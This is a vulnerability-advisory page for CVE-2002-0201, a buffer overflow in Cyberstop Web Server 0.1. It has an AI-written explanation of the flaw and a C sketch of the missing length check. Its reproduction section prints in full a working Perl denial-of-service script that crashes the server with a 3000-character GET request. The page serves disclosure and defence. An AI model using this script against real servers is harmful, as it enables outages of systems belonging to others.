VYPR
Unrated severity · NVD Advisory · Published May 16, 2002 · Updated Jun 16, 2026

CVE-2002-0201

Description

Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability mechanics

Root cause

"A long HTTP GET request triggers a buffer overflow, leading to a denial of service or potential arbitrary code execution."

Attack vector

An attacker can send a crafted HTTP GET request containing an unusually large number of arbitrary characters to a vulnerable Cyberstop Web Server. This malformed request is designed to exceed the buffer allocated for handling requests, causing the server to crash and become unresponsive. The exploit script demonstrates sending a GET request with approximately 3000 'A' characters to trigger this condition [ref_id=1].

Affected code

The vulnerability resides within the HTTP request handling mechanism of Cyberstop Web Server for Windows version 0.1. Specifically, the server fails to properly validate the length of incoming HTTP GET requests, leading to a buffer overflow when processing excessively long requests [ref_id=1].
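The missing length check described above, sketched in C as an added example. It is not Cyberstop's code (the page shows none), and the 1024-byte limit, the function names and the mapping to HTTP status codes are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 1024 /* assumed limit; the page gives no buffer size */

enum { REQ_OK = 200, REQ_BAD = 400, REQ_URI_TOO_LONG = 414 };

/* Copy the target of "GET <target> HTTP/1.x" from req[0..len) into out.
 * The length is measured and checked before any byte is copied, which is
 * the validation the advisory says the server lacked. */
int parse_get_target(const char *req, size_t len, char *out, size_t out_sz)
{
    size_t n = 0;

    if (out_sz == 0)
        return REQ_BAD;
    out[0] = '\0';
    if (len < 5 || memcmp(req, "GET /", 5) != 0)
        return REQ_BAD;
    req += 4;                      /* target starts at the '/' */
    len -= 4;
    while (n < len && req[n] != ' ' && req[n] != '\r' && req[n] != '\n')
        n++;
    if (n > MAX_TARGET || n >= out_sz)
        return REQ_URI_TOO_LONG;   /* reject; never truncate and continue */
    if (n == len)
        return REQ_BAD;            /* no terminator: incomplete request line */
    memcpy(out, req, n);
    out[n] = '\0';
    return REQ_OK;
}

/* Constructed input: "GET /" + fill x 'A' + " HTTP/1.0\r\n\r\n". */
int status_for_fill(size_t fill)
{
    static char req[8192];
    char target[MAX_TARGET + 1];

    if (fill > sizeof req - 32)
        return -1;                 /* would not fit the sample buffer */
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', fill);
    memcpy(req + 5 + fill, " HTTP/1.0\r\n\r\n", 13);
    return parse_get_target(req, 5 + fill + 13, target, sizeof target);
}

int main(void)
{
    printf("short: %d, 3000 bytes: %d\n", status_for_fill(16), status_for_fill(3000));
    return 0;
}
```

A request of the size described in the attack vector is answered with 414 instead of being copied into a fixed buffer.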

What the fix does

The advisory does not specify a patch or provide details on how the vulnerability is fixed. Remediation guidance suggests that users should update to a version of the software that addresses this issue, though no specific version is mentioned. Users are advised to consult vendor advisories for the most current information on available fixes.

Preconditions

  • input: The server must receive an HTTP GET request.
  • input: The HTTP GET request must contain an unusually large number of arbitrary characters.

Reproduction

```perl
#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server,
# resulting in the server crashing.
#
# CyberStop WEbserver v0.1 proof-of-concept exploit
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x Cyber_DoS.pl -s <server>
#
# Example:
#
# perl -x Cyber_DoS.pl -s 10.0.0.1
#
# Crash was successful !
#

use Getopt::Std;
use IO::Socket;

print("\nCyberStop WEbserver v0.1 DoS exploit (c)2002.\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

$def = "A";
$num = "3000";
$data .= $def x $num;
$serv = $args{s};
$port = 80;
$buf = "GET /$data /HTTP/1.0\r\n\r\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S);
$| = 1;
select(STDOUT);
print S "$buf";

print("\nCrash was successful !\n\n");

sub usage { die("\n\nUsage: perl -x $0 -s <server>\n\n"); }
```

[ref_id=1]

Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3
